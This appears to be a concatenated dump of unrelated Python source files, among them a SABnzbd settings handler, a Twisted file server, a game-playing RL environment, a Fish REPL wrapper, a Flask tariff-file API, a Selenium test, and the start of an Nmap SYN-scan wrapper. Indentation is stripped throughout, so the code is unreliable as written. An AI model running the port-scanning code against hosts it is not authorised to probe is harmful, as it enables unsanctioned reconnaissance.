conf['have_ncenter'] = sabnzbd.DARWIN and sabnzbd.FOUNDATION
conf['scripts'] = list_scripts(default=False, none=True)
for kw in LIST_EMAIL:
conf[kw] = config.get_config('misc', kw).get_string()
for kw in LIST_PROWL:
conf[kw] = config.get_config('prowl', kw)()
for kw in LIST_PUSHOVER:
conf[kw] = config.get_config('pushover', kw)()
for kw in LIST_PUSHBULLET:
conf[kw] = config.get_config('pushbullet', kw)()
for kw in LIST_NCENTER:
conf[kw] = config.get_config('ncenter', kw)()
for kw in LIST_ACENTER:
conf[kw] = config.get_config('acenter', kw)()
for kw in LIST_NTFOSD:
conf[kw] = config.get_config('ntfosd', kw)()
for kw in LIST_NSCRIPT:
conf[kw] = config.get_config('nscript', kw)()
conf['notify_keys'] = sabnzbd.constants.NOTIFY_KEYS
conf['notify_texts'] = sabnzbd.notifier.NOTIFICATION
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_notify.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveEmail(self, **kwargs):
ajax = kwargs.get('ajax')
for kw in LIST_EMAIL:
msg = config.get_config('misc', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_NCENTER:
msg = config.get_config('ncenter', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_ACENTER:
msg = config.get_config('acenter', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_NTFOSD:
msg = config.get_config('ntfosd', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_PROWL:
msg = config.get_config('prowl', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_PUSHOVER:
msg = config.get_config('pushover', kw).set(kwargs.get(kw))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_PUSHBULLET:
msg = config.get_config('pushbullet', kw).set(kwargs.get(kw, 0))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
for kw in LIST_NSCRIPT:
msg = config.get_config('nscript', kw).set(kwargs.get(kw, 0))
if msg:
return badParameterResponse(T('Incorrect value for %s: %s') % (kw, msg), ajax)
config.save_config()
self.__lastmail = None
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
|
streaming.py
|
#!/usr/bin/env python3
# encoding: UTF-8
import os
import socket
import threading
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site
from twisted.web.static import File
# from twisted.python import log
def set_files(files, serve_ip, serve_port):
files_index = {file_key: (os.path.basename(file_path),
os.path.abspath(file_path),
os.path.dirname(os.path.abspath(file_path)))
for file_key, file_path in files.items()}
files_serve = {file_name: file_path
for file_name, file_path, file_dir in files_index.values()}
files_urls = {
file_key: "http://{0}:{1}/{2}/{3}".format(
serve_ip, serve_port, file_key, file_name)
for file_key, (file_name, file_path, file_dir)
in files_index.items()}
return files_index, files_serve, files_urls
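# Illustrative sketch (hypothetical path and address, not part of the original
# code): for files = {"file_1": "/tmp/movie.mp4"} and serve_ip "192.168.1.10",
# files_urls would be {"file_1": "http://192.168.1.10:9000/file_1/movie.mp4"},
# while files_serve maps the bare name "movie.mp4" to its absolute path.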
def start_server(files, serve_ip, serve_port=9000):
# import sys
# log.startLogging(sys.stdout)
files_index, files_serve, files_urls = set_files(
files, serve_ip, serve_port)
root = Resource()
for file_key, (file_name, file_path, file_dir) in files_index.items():
root.putChild(file_key.encode("utf-8"), Resource())
root.children[file_key.encode("utf-8")].putChild(
file_name.encode("utf-8"), File(file_path))
reactor.listenTCP(serve_port, Site(root))
threading.Thread(
target=reactor.run, kwargs={"installSignalHandlers": False}).start()
return files_urls
def get_serve_ip(target_ip, target_port=80):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
serve_ip = s.getsockname()[0]
s.close()
return serve_ip
if __name__ == "__main__":
import sys
files = {"file_{0}".format(i): file_path for i,
file_path in enumerate(sys.argv[1:], 1)}
print(files)
files_urls = start_server(files, "localhost")
print(files_urls)
|
environment.py
|
"""
Copyright (c) <2018> YoongiKim
See the file license.txt for copying permission.
"""
import numpy as np
import cv2
import time
import pyautogui
from RiderEnvironment.grabscreen import grab_screen
from RiderEnvironment import show_window
import threading
from RiderEnvironment import read_score
import gym
## PRESS CTRL + ALT + DEL to stop program
class PreviousFrameMixer:
PreviousFrames = []
def __init__(self, number_of_frames, height, width):
self.height = height
self.width = width
self.len = number_of_frames
self.clear()
def clear(self):
self.PreviousFrames = []
for i in range(self.len):
self.PreviousFrames.append(np.zeros(shape=(self.height, self.width), dtype=np.uint8))
def stack_frame(self, img):
self.PreviousFrames.append(img)
self.PreviousFrames.pop(0)
def get_mixed_frames(self): # mix previous frames by time to reduce memory
result_img = np.zeros(shape=(self.height, self.width), dtype=np.uint8)
for i in range(self.len):
            result_img = cv2.addWeighted(result_img, float(i/self.len), self.PreviousFrames[i], float((i + 1)/self.len), 0)
return np.array(result_img)
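# Minimal usage sketch for PreviousFrameMixer (illustrative, assuming the
# 100x100 uint8 grayscale frames used by RiderEnv below):
#   mixer = PreviousFrameMixer(4, 100, 100)
#   mixer.stack_frame(frame)             # push the newest frame, drop the oldest
#   blended = mixer.get_mixed_frames()   # newer frames get a larger blend weight
# get_mixed_frames() accumulates the buffered frames so the most recent one
# dominates the result while older ones fade out.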
class RiderEnv:
LastScore = 0
LastAction = 0
capture_x = 8
capture_y = 120
capture_w = 296
capture_h = 296
    obs_w = 100  # Must also change models.py lines 224 and 287
obs_h = 100
step_count = 0
same_score_count = 0
frame_mixer = PreviousFrameMixer(4, obs_h, obs_w)
def __init__(self):
self.frame_mixer.clear()
self.observation_space = \
gym.spaces.Box(low=0, high=255,
shape=np.zeros(shape=(self.obs_h * self.obs_w), dtype=np.uint8).shape
, dtype=np.uint8)
#self.action_space = gym.spaces.Box(low=0, high=1, shape=np.zeros(1).shape, dtype=np.float32)
self.action_space = gym.spaces.Discrete(2)
def reset(self):
print('env reset')
show_window.ShowWindow()
pyautogui.moveTo(155, 350)
self.LastScore = 0
self.LastAction = 0
self.same_score_count = 0
self.frame_mixer.clear()
self.close_advertise_window()
self.click()
time.sleep(1.5)
self.click()
observation = np.zeros(shape=(self.obs_h, self.obs_w), dtype=np.uint8)
return np.array(observation).flatten()
def step(self, action):
# observation, reward, done, score
self.step_count += 1
if float(action[0]) >= 0.5 and self.LastAction == 0:
#print("mouse down")
self.mouse_down()
self.LastAction = 1
elif float(action[0]) < 0.5 and self.LastAction == 1:
#print("mouse up")
self.mouse_up()
self.LastAction = 0
result_frame = self.get_frame()
done = self.isDone(result_frame)
main_menu = self.isMainMenu(result_frame)
self.close_advertise_window()
score = self.LastScore
if self.step_count % 5 == 0:
score = self.get_score(result_frame)
# score = self.get_score(result_frame)
if score <= self.LastScore:
self.same_score_count += 1
if self.same_score_count > 150:
self.back_to_menu()
else:
self.same_score_count = 0
reward = (score - self.LastScore) * 5 \
+ 0.005*self.LastAction \
- self.same_score_count * 0.005
self.LastScore = score
if done:
reward = score - self.LastScore
#reward = -1*(100-self.LastScore)
current_observation = self.__get_observation(result_frame)
self.frame_mixer.stack_frame(current_observation)
if self.step_count % 1 == 0:
print("step: {}, reward: {}, done: {}, score: {}, action: {}"
.format(self.step_count, reward, done, score, action[0]))
mixed_frame = self.frame_mixer.get_mixed_frames()
self.show(mixed_frame, "obs", 313, 200)
return mixed_frame.flatten(), reward, done, self.LastScore
def close(self):
cv2.destroyAllWindows()
def __get_observation(self, screen):
edge_screen = self.process_img(screen)
return edge_screen
def to_binary(self, img):
retval, threshold = cv2.threshold(img, 127, 1, cv2.THRESH_BINARY)
return np.array(threshold)
def render(self):
return
def get_frame(self):
screen = grab_screen(region=(0, 0, 312, 578))
return screen
def process_img(self, image):
# convert to gray
processed_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# cut unused area
y=self.capture_y
x=self.capture_x
h=self.capture_h
w=self.capture_w
processed_img = processed_img[y:y+h, x:x+w]
processed_img = cv2.Canny(processed_img, threshold1=200, threshold2=300)
#processed_img = cv2.GaussianBlur(processed_img, (5, 5), 0)
processed_img = cv2.resize(processed_img, (self.obs_w, self.obs_h), cv2.INTER_AREA)
return processed_img
def get_score(self, image):
x = 154-50
y = 136-50
w = 100
h = 100
score_image = image[y:y + h, x:x + w]
score = read_score.read(score_image)
if abs(score - self.LastScore) >= 10:
score = self.LastScore
return score
def isDone(self, original_img):
if self.mean_bgr(original_img[574, 10]) <= 4:
return True
else:
return False
def isMainMenu(self, original_img):
if self.mean_bgr(original_img[475, 288]) >= 254 \
and self.mean_bgr(original_img[466, 24]) >= 254:
return True
else:
return False
def mean_bgr(self, pixel):
sum = 0
for i in range(3):
sum += pixel[i]
sum /= 3
return sum
def close_advertise_window(self):
frame = self.get_frame()
done = self.isDone(frame)
main_menu = self.isMainMenu(frame)
while done and not main_menu:
print('done: {}, main menu: {}'.format(done, main_menu))
time.sleep(0.5)
self.click(250, 163)
self.click(260, 142)
self.mouse_move_to_center()
frame = self.get_frame()
done = self.isDone(frame)
main_menu = self.isMainMenu(frame)
def back_to_menu(self):
self.click(22, 60)
time.sleep(1)
self.click(153,353)
time.sleep(1)
def show(self, img, title, x=400, y=500):
cv2.imshow(title, img)
cv2.moveWindow(title, x, y)
cv2.waitKey(1)
def mouse_up(self):
threading.Thread(target=pyautogui.mouseUp).start()
# pyautogui.mouseUp()
def mouse_down(self):
self.mouse_move_to_center()
# threading.Thread(target=pyautogui.mouseDown).start()
pyautogui.mouseDown()
def mouse_move_to_center(self):
# threading.Thread(target=pyautogui.moveTo, args=[155, 350]).start()
pyautogui.moveTo(155, 350)
def click(self, x=155, y=350):
# threading.Thread(target=pyautogui.click, args=[x, y]).start()
pyautogui.click(x, y)
|
repl.py
|
"""Interact with a Fish REPL.
"""
import os
import sys
import subprocess
from subprocess import PIPE
import time
from threading import Thread
import tempfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
def write_thread(q, f):
while True:
data = q.get()
f.write(data)
f.flush()
def read_thread(f, q):
while True:
data = f.read(1)
q.put(data)
def write(f):
q = Queue()
t = Thread(target=write_thread, args=(q, f))
t.daemon = True
t.start()
return q
def read(f):
q = Queue()
t = Thread(target=read_thread, args=(f, q))
t.daemon = True
t.start()
return q
def q_until_null(q):
ba = bytearray()
while True:
c = q.get()
if c == b'\0':
return bytes(ba)
ba.append(c[0])
class Fish:
"""A Fish instance running a custom REPL in a subprocess.
Each instance of this class has its own subprocess, with its own
state (variables, loaded functions, etc).
"""
def __init__(self):
homedir = tempfile.mkdtemp(prefix="vf-fish-home")
self.homedir = homedir
# Start Fish up with our custom REPL. We don't use the built-in
# REPL because if we run Fish non-interactively we can't tell
# the difference between Fish waiting for input and whatever
# command we ran waiting for something else, and if we run it
# in a pty we'd have to correctly handle the fish_prompt, fish
# echoing back our input (and possibly even syntax highlighting
# it), and so on.
self.subp = subprocess.Popen(
(
subprocess.check_output(('which', 'fish')).strip(),
os.path.join(os.path.dirname(__file__), 'repl.fish'),
),
stdin=PIPE, stdout=PIPE, stderr=PIPE,
env={'HOME': homedir},
)
# We read and write to/from stdin/out/err in threads, to prevent
# deadlocks (see the warning in the subprocess docs).
self.stdin_q = write(self.subp.stdin)
self.stdout_q = read(self.subp.stdout)
self.stderr_q = read(self.subp.stderr)
def run(self, cmd, expected_exit_codes=(0,)):
"""Run a command on the REPL.
The command can do anything except read from standard input
(because there's currently no way for the test case to write
into it) or print a null byte (since that's how the REPL signals
that the command has finished).
:param cmd: The command to run.
:type cmd: str|bytes
        :param expected_exit_codes: The exit codes you expect the command
            to produce.
:type expected_exit_codes: Iterable[int]
:return: Standard output, standard error.
:rtype: Tuple[bytes, bytes]
"""
if isinstance(cmd, str):
cmd = cmd.encode('utf8')
self.stdin_q.put(cmd)
self.stdin_q.put(b'\0')
output = q_until_null(self.stdout_q)
error = q_until_null(self.stderr_q)
status = int(q_until_null(self.stdout_q).decode('utf8'))
if status not in expected_exit_codes:
sys.stdout.write(output)
sys.stderr.write(error)
raise ValueError("Expected command to exit with {}, got {}".format(
expected_exit_codes, status
))
return output, error
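# Protocol note (added for clarity): run() writes the command followed by a null
# byte, and the companion repl.fish script (not shown here) is expected to write
# the command's output to stdout, its error output to stderr, and finally the
# exit status to stdout, each terminated by a null byte; q_until_null() collects
# those frames in that order above.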
if __name__ == "__main__":
# If invoked directly, executes a bunch of simple test commands.
    # This is to make manual testing easier.
f = Fish()
print(f.run("echo 1"))
print(f.run("echo 1 >&2"))
print(f.run("set foo bar"))
print(f.run("echo $foo"))
print(f.run("false"))
|
camera.py
|
from threading import Thread
import numpy as np
import cv2
import imutils
import time
class Camera:
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
time.sleep(1)
Thread(target=self.update, args=()).start()
print("[init] Camera")
def update(self):
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
return self.frame
def stop(self):
self.stopped = True
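# Minimal usage sketch (added for illustration, not part of the original module):
# read frames from the threaded capture and display them until 'q' is pressed.
# Assumes a webcam is available at index 0.
if __name__ == "__main__":
    cam = Camera(0)
    try:
        while True:
            frame = cam.read()
            if frame is None:
                continue
            cv2.imshow("camera", frame)
            if cv2.waitKey(1) & 0xFF == ord("q"):
                break
    finally:
        cam.stop()
        cv2.destroyAllWindows()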
|
taricapi.py
|
from gevent import monkey # noqa: E402 # pylint: disable=C0411, C0412, C0413
monkey.patch_all() # noqa: E402 # pylint: disable=C0411, C0413
import datetime
import hashlib
import io
import json
from logging.config import dictConfig
import re
import signal
import threading
import uuid
from elasticapm.contrib.flask import ElasticAPM
from flask import Flask, render_template, make_response, request, Response
from flask.logging import create_logger
from gevent.pywsgi import WSGIServer
import gevent
from IPy import IP
from lxml import etree
import requests
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from apifiles3 import write_file
from apifiles3 import remove_temp_taric_file
from apifiles3 import rename_taric_file
from apifiles3 import save_temp_taric_file
from apifiles3 import stream_taric_file
from apifiles3 import get_taric_index_file
from apifiles3 import get_taric_filepath
from apifiles3 import get_file_list
from apifiles3 import get_file_size
from apifiles3 import read_file
from apifiles3 import file_exists
from apifiles3 import md5
from apifiles3 import modification_date
from config import (
API_ROOT,
APIKEYS,
APIKEYS_UPLOAD,
WHITELIST,
WHITELIST_UPLOAD,
PORT,
LOGGING,
NUM_PROXIES,
REQUIRE_AUTH_FOR_READS,
SENTRY_DSN,
ELASTIC_APM_TOKEN,
ELASTIC_APM_URL,
ENVIRONMENT,
GA_TRACKING_ID,
GA_ENDPOINT,
)
# Use apifile for file system, apifiles3 for AWS S3
dictConfig(LOGGING)
app = Flask(__name__, static_url_path='/static', static_folder='static')
logger = create_logger(app)
# -----------------------
# HTTP HEADERS / API KEYS
# -----------------------
def get_apikey(request):
apikey = ""
if request.headers.get("X-API-KEY", None):
apikey = request.headers.get("X-API-KEY")
logger.info("Api key is in header")
else:
logger.info("No api key in header")
return apikey
def get_remoteaddr(request):
if request.environ.get("HTTP_X_FORWARDED_FOR") is None:
logger.info("Remote addresses are %s", request.environ["REMOTE_ADDR"])
remoteaddrs = request.environ["REMOTE_ADDR"].split(",")
else:
logger.info("Remote addresses are %s", request.environ["HTTP_X_FORWARDED_FOR"])
remoteaddrs = request.environ["HTTP_X_FORWARDED_FOR"].split(",")
if len(remoteaddrs) > NUM_PROXIES:
logger.warning("Additional remote addresses stripped (possible spoofing)")
remoteaddrs = remoteaddrs[-NUM_PROXIES:]
return remoteaddrs
def in_whitelist(remoteaddrs):
for addr in remoteaddrs:
for wlip in WHITELIST:
logger.debug("%s %s", addr, wlip)
if addr in IP(wlip):
return True
return False
def in_whitelist_upload(remoteaddrs):
for addr in remoteaddrs:
for wlip in WHITELIST_UPLOAD:
logger.debug("%s %s", addr, wlip)
if addr in IP(wlip):
return True
return False
def in_apikeys(apikey):
hashed_apikey = str(hashlib.sha256(apikey.encode("ascii")).hexdigest())
try:
return hashed_apikey in APIKEYS
except ValueError:
return False
def in_apikeys_upload(apikey):
hashed_apikey = hashlib.sha256(apikey.encode("ascii")).hexdigest()
try:
return hashed_apikey in APIKEYS_UPLOAD
except ValueError:
return False
def is_auth(request):
if REQUIRE_AUTH_FOR_READS:
apikey = get_apikey(request)
remoteaddr = get_remoteaddr(request)
return in_apikeys(apikey) and in_whitelist(remoteaddr)
return True
def is_auth_upload(request):
apikey = get_apikey(request)
remoteaddrs = get_remoteaddr(request)
return in_apikeys_upload(apikey) and in_whitelist_upload(remoteaddrs)
# ---------------------------
# URL Parameter validation
# Dates as ISO8601 YYYY-MM-DD
# Files as YYSSSS
# ---------------------------
def is_valid_date(date):
return re.match(r"^\d{4}-\d\d-\d\d$", date)
def is_valid_datetime(date):
return re.match(r"^\d{4}-\d\d-\d\d(T\d\d:\d\d:\d\d(\.\d\d\d)?)?$", date)
def is_valid_seq(seq):
return re.match(r"^\d{6}$", seq)
def is_virus_checked(file):
# TODO
return True
def is_schema_validated(xmlfile):
logger.debug("VALIDATING %s", xmlfile)
xsd_doc = etree.parse("taric3.xsd")
xsd = etree.XMLSchema(xsd_doc)
try:
xml = etree.parse(io.BytesIO(read_file(xmlfile)))
except Exception: # pylint: disable=W0703
logger.info("Unable to parse file as XML")
return False
if not xsd.validate(xml):
logger.info("XML Failed validation")
logger.debug("%s", xsd.error_log)
else:
logger.info("XML validates against taric3 schema")
return xsd.validate(xml)
# ------------------
# Create index entry
# ------------------
def create_index_entry(seq):
index_entry = {
"id": int(seq),
"issue_date": modification_date(get_taric_filepath(seq)),
"url": API_ROOT + "taricfiles/" + seq,
"md5": md5(get_taric_filepath(seq)),
"size": get_file_size(get_taric_filepath(seq)),
}
return index_entry
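# Illustrative shape of an index entry (hypothetical values, added for clarity):
#   {"id": 200123, "issue_date": "<ISO timestamp of the stored file>",
#    "url": API_ROOT + "taricfiles/200123", "md5": "<hex digest>", "size": 12345}
# issue_date, md5 and size are all derived from the stored Taric file itself.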
# ----------------
# Google Analytics
# ----------------
def _send_to_google_analytics(
requester_ip, request_host, request_path, request_headers
):
logger.debug('Sending to Google Analytics %s: %s...', request_host, request_path)
requests.post(
GA_ENDPOINT,
data={
'v': '1',
'tid': GA_TRACKING_ID,
'cid': str(uuid.uuid4()),
't': 'pageview',
'uip': requester_ip,
'dh': request_host,
'dp': request_path,
'ds': 'public-tariffs-api',
'dr': request_headers.get('referer', ''),
'ua': request_headers.get('user-agent', ''),
},
)
logger.info("sent to ga")
# --------------------------------
# Rebuild master file index (JSON)
# --------------------------------
def rebuild_index(nocheck):
def _rebuild_index():
if not file_exists(get_taric_index_file()) or nocheck:
logger.info("*** Rebuilding file index... ***")
all_deltas = []
files = get_file_list(None)
logger.info("%s", files)
for file in files:
# build entry for file just uploaded
# TODO (possibly) Add Metadata generation -> then could have api /taricfilemd/...
# TODO - combine with individual update_index..
f = file["Key"]
f = f[f.rindex("/") + 1 :] # remove folder prefix
logger.info("Found file %s", f)
if f.startswith("TEMP_"):
logger.info("Removing temporary file %s", f)
seq = f[5:-4] # remove TEMP_ file prefix and .xml extension
remove_temp_taric_file(seq)
else:
if is_valid_seq(f[:-4]): # ignore non taric files
seq = f[:-4] # remove .xml extension
all_deltas.append(create_index_entry(seq))
logger.debug("%s delta files listed after update", str(len(all_deltas)))
# persist updated index
all_deltass = json.dumps(all_deltas)
write_file(get_taric_index_file(), all_deltass)
logger.info("Index rebuild complete")
logger.debug("Starting thread to rebuild index.")
threading.Thread(target=_rebuild_index).start()
@app.route("/api/v1/rebuildindex", methods=["POST"])
def rebuild_index_controller():
if not is_auth_upload(request):
logger.info("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
rebuild_index(True)
return Response("202 index is being rebuilt", status=202)
# -------------------------------
# Update master file index (JSON)
# -------------------------------
def update_index(seq):
all_deltas = json.loads(read_file(get_taric_index_file()))
logger.debug(
"%s delta files listed in %s", str(len(all_deltas)), get_taric_index_file()
)
# build entry for file just uploaded
# TODO (possibly) Add Metadata file generation -> then could have api /taricfilesmd/...
# if the file was overwritten, just update the index, else append
existing = [d for d in all_deltas if d["id"] == int(seq)]
if len(existing) > 0:
logger.info("File %s overwritten", seq)
i = 0
for d in all_deltas:
logger.debug("%s", d)
if d["id"] == int(seq):
all_deltas[i] = create_index_entry(seq)
i = i + 1
else:
all_deltas.append(create_index_entry(seq))
logger.debug("%s delta files listed after update", str(len(all_deltas)))
# persist updated index
all_deltass = json.dumps(all_deltas)
write_file(get_taric_index_file(), all_deltass)
# ---------------------------------------------
# index page - could be used for pings / checks
# ---------------------------------------------
@app.route("/check")
def check():
logger.debug("%s", request.headers)
logger.debug("%s", request.environ)
message = (
"Request from "
+ get_apikey(request)
+ " @ "
+ " ".join(get_remoteaddr(request))
)
return render_template("check.html", message=message)
@app.route("/healthcheck")
def healthcheck():
return Response(
"""
<?xml version="1.0" encoding="UTF-8"?>
<pingdom_http_custom_check>
<status>OK</status>
</pingdom_http_custom_check>
""",
status=200,
headers={
"Content-Type": "text/xml",
"Cache-Control": "no-cache, no-store, must-revalidate",
},
)
@app.route("/")
def hello():
return render_template("index.html")
# --------------------------------------------------------------------------------------------
# API to retrieve list of delta files (for a date or defaults to yesterday to get latest file)
# NB using today would provide files loaded today
# but there is no guarantee that the list will not change (i.e. extend) later due to further files
# --------------------------------------------------------------------------------------------
@app.route("/api/v1/taricdeltas/<date>", methods=["GET"])
@app.route("/api/v1/taricdeltas/", defaults={"date": ""}, methods=["GET"])
@app.route("/api/v1/taricdeltas", defaults={"date": ""}, methods=["GET"])
def taricdeltas(date):
# Default to yesterday
if date == "" or date is None:
yesterday = datetime.datetime.now() - datetime.timedelta(days=1)
date = yesterday.strftime("%Y-%m-%d")
logger.debug("defaulted date to %s", date)
if not is_valid_date(date):
logger.debug("date is invalid")
return Response("Bad request [invalid date] (400)", status=400)
if not is_auth(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
logger.debug("date is %s", date)
# All Taric files uploaded are stored in the index
# Find files that have the issue date the same as the requested date
# Output the response filtered by the date
all_deltas = json.loads(read_file(get_taric_index_file()))
logger.debug(
"%s delta files listed in %s", str(len(all_deltas)), get_taric_index_file()
)
deltas_on_date = [d for d in all_deltas if d["issue_date"].startswith(date)]
if len(deltas_on_date) == 0:
logger.debug("No delta files available for date %s", date)
return Response("404 Not found", status=404)
logger.debug("%s delta files for date %s", str(len(deltas_on_date)), date)
deltas_json = json.dumps(deltas_on_date)
r = make_response(deltas_json)
r.headers.set("Content-Type", "application/json")
return r
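# Illustrative client sketch (not part of the original module): fetching the
# delta list for a given date with the 'requests' library. The host/port and
# the "X-API-KEY" header name are assumptions -- is_auth() is defined elsewhere,
# so substitute whatever authentication the deployment actually expects.
#
#   import requests
#   resp = requests.get(
#       "http://localhost:8080/api/v1/taricdeltas/2021-01-01",
#       headers={"X-API-KEY": "<api key>"},
#   )
#   if resp.status_code == 200:
#       for delta in resp.json():
#           print(delta["id"], delta["issue_date"])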
# -----------------------------------------
# API to retrieve contents of specific file
# -----------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["GET"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["GET"])
def taricfiles(seq):
if not is_auth(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
if not is_valid_seq(seq):
logger.debug("seq is invalid")
return Response("400 Bad request [invalid seq]", status=400)
body_generator = stream_taric_file(seq)
if body_generator is None:
logger.debug("Requested file not found %s", seq)
return Response("404 Taric file does not exist", status=404)
return Response(
body_generator,
mimetype="text/xml",
headers={"Content-Length": get_file_size(get_taric_filepath(seq))},
)
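# Illustrative download sketch (same assumptions as above for host/port and the
# API key header); streams the XML body returned by stream_taric_file():
#
#   resp = requests.get(
#       "http://localhost:8080/api/v1/taricfiles/123456",
#       headers={"X-API-KEY": "<api key>"},
#       stream=True,
#   )
#   with open("123456.xml", "wb") as f:
#       for chunk in resp.iter_content(chunk_size=8192):
#           f.write(chunk)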
# --------------------------------------------------------------------
# API to upload new taric file
# File in the API is identified by seq regardless of its source name
# File modification time can be set using ?modtime=yyyy-mm-ddThh:mm:ss
# --------------------------------------------------------------------
@app.route("/api/v1/taricfiles/<seq>", methods=["POST"])
@app.route("/api/v1/taricfiles", defaults={"seq": ""}, methods=["POST"])
def taricfiles_upload(seq):
modtime = None
if not is_auth_upload(request):
logger.debug("API key not provided or not authorised")
return Response("403 Unauthorised", status=403)
if not is_valid_seq(seq):
logger.debug("seq is invalid")
return Response("400 Bad request [invalid seq]", status=400)
if "file" not in request.files:
logger.debug("No file uploaded")
return Response("400 No file uploaded", status=400)
# 'file' is the file attached to the POST request
file = request.files["file"]
if not file or file.filename == "":
logger.debug("No file uploaded")
return Response("400 No file uploaded", status=400)
logger.debug("file uploaded is %s", file.filename)
if request.args.get("modtime") is not None:
if not is_valid_datetime(request.args.get("modtime")):
logger.debug(
"Invalid file modification timestamp specified %s",
request.args.get("modtime"),
)
return Response(
"400 Invalid file modification timestamp specified", status=400
)
else:
modtime = request.args.get("modtime")
logger.debug("file mod time is %s", modtime)
# Save the uploaded XML file as temporary
temp_file_name = save_temp_taric_file(file, seq)
# TODO - should virus check ..
if not is_virus_checked(file.read()):
logger.debug("File failed virus check")
remove_temp_taric_file(seq)
return Response("400 Failed virus check", status=400)
# Validate XML against XSD
if not is_schema_validated(temp_file_name):
logger.debug("File failed schema check")
remove_temp_taric_file(seq)
return Response("400 Failed schema check", status=400)
# Rename the temporary XML file and update the index - used by the deltas API
try:
rename_taric_file(seq, modtime)
update_index(seq)
except IOError as exc:
logger.error("Error saving file %s.xml: %s", seq, str(exc))
return Response("500 Error saving file", status=500)
return Response("200 OK File uploaded", status=200)
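# Illustrative upload sketch (host/port, API key header and the seq value are
# assumptions; the "file" form field and the optional ?modtime query parameter
# come from the handler above):
#
#   import requests
#   with open("DIT123456.xml", "rb") as xml:
#       resp = requests.post(
#           "http://localhost:8080/api/v1/taricfiles/123456",
#           params={"modtime": "2021-01-01T12:00:00"},
#           headers={"X-API-KEY": "<upload api key>"},
#           files={"file": xml},
#       )
#   print(resp.status_code, resp.text)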
def get_server():
if SENTRY_DSN:
sentry_sdk.init(
dsn=SENTRY_DSN, integrations=[FlaskIntegration()],
)
@app.after_request
def add_x_robots(response): # pylint: disable=W0612
response.headers['X-Robots-Tag'] = 'noindex, nofollow'
response.headers[
'Strict-Transport-Security'
] = "max-age=31536000; includeSubDomains"
if GA_TRACKING_ID:
gevent.spawn(
_send_to_google_analytics,
request.remote_addr,
request.host_url,
request.path,
request.headers,
)
return response
elastic_apm_url = ELASTIC_APM_URL
elastic_apm_secret_token = ELASTIC_APM_TOKEN
elastic_apm = (
{
'SERVICE_NAME': 'public-tariffs-api',
'SECRET_TOKEN': elastic_apm_secret_token,
'SERVER_URL': elastic_apm_url,
'ENVIRONMENT': ENVIRONMENT,
}
if elastic_apm_url and elastic_apm_secret_token
else {}
)
if elastic_apm:
app.config['ELASTIC_APM'] = elastic_apm
ElasticAPM(app)
server = WSGIServer(("0.0.0.0", PORT), app, log=app.logger)
return server
def main():
rebuild_index(False)
server = get_server()
gevent.signal_handler(signal.SIGTERM, server.stop)
server.serve_forever()
gevent.get_hub().join()
if __name__ == "__main__":
main()
|
test_selenium.py
|
import unittest
import threading
from selenium import webdriver
from app import create_app, db
from models.role import Role
from models.user import User
from models.category import Category
from utils.fake_util import FakeUtil
class SeleniumTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
try:
cls.client = webdriver.Chrome('./chromedriver')
except Exception:
pass
if not cls.client:
return
cls.app = create_app('test')
cls.app_context = cls.app.app_context()
cls.app_context.push()
# Suppress werkzeug request logging
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel('ERROR')
db.create_all()
Role.insert_roles()
Category.insert_categories()
FakeUtil.generate_fake_users(10)
FakeUtil.generate_fake_articles(10)
admin_role = Role.query.filter_by(name='Administrator').first()
admin = User(email='singledog@gmail.com', username='john',
password='dog', role=admin_role, confirmed=True)
db.session.add(admin)
db.session.commit()
threading.Thread(target=cls.app.run).start()
@classmethod
def tearDownClass(cls):
if not cls.client:
return
# Shut down the Flask server and close the browser
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
db.drop_all()
db.session.remove()
cls.app_context.pop()
def setUp(self):
if not self.client:
self.skipTest('Web browser not available')
def tearDown(self):
pass
def test_admin_home_page(self):
import re
self.client.get('http://localhost:5000/')
self.assertTrue(re.search('Stranger', self.client.page_source))
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('Log In' in self.client.page_source)
self.client.find_element_by_name('email').send_keys('singledog@gmail.com')
self.client.find_element_by_name('password').send_keys('dog')
self.client.find_element_by_name('submit').click()
self.assertTrue(re.search('john', self.client.page_source))
|
NmapAPI.py
|
import nmap
import threading
from tqdm import tqdm
from CoreUtils.Debug import Debug_Print
from Configuration.Configuration import APP_CONFIGURATION
class Nmapper:
def __init__(self):
self.scanner = nmap.PortScanner()
self.count = 0
self.flag = 0
def _quick_scan(self, target, port):
try:
self.scanner.scan(hosts=target, ports=str(port), arguments="-sS", sudo=True, timeout=5)
except Exception as exception:
Debug_Print("\033[1;31m[-] Scan Failed: %s!"%str(exception))
self.count -= 1
return
protocol = self.scanner[target].all_protocols()[0]
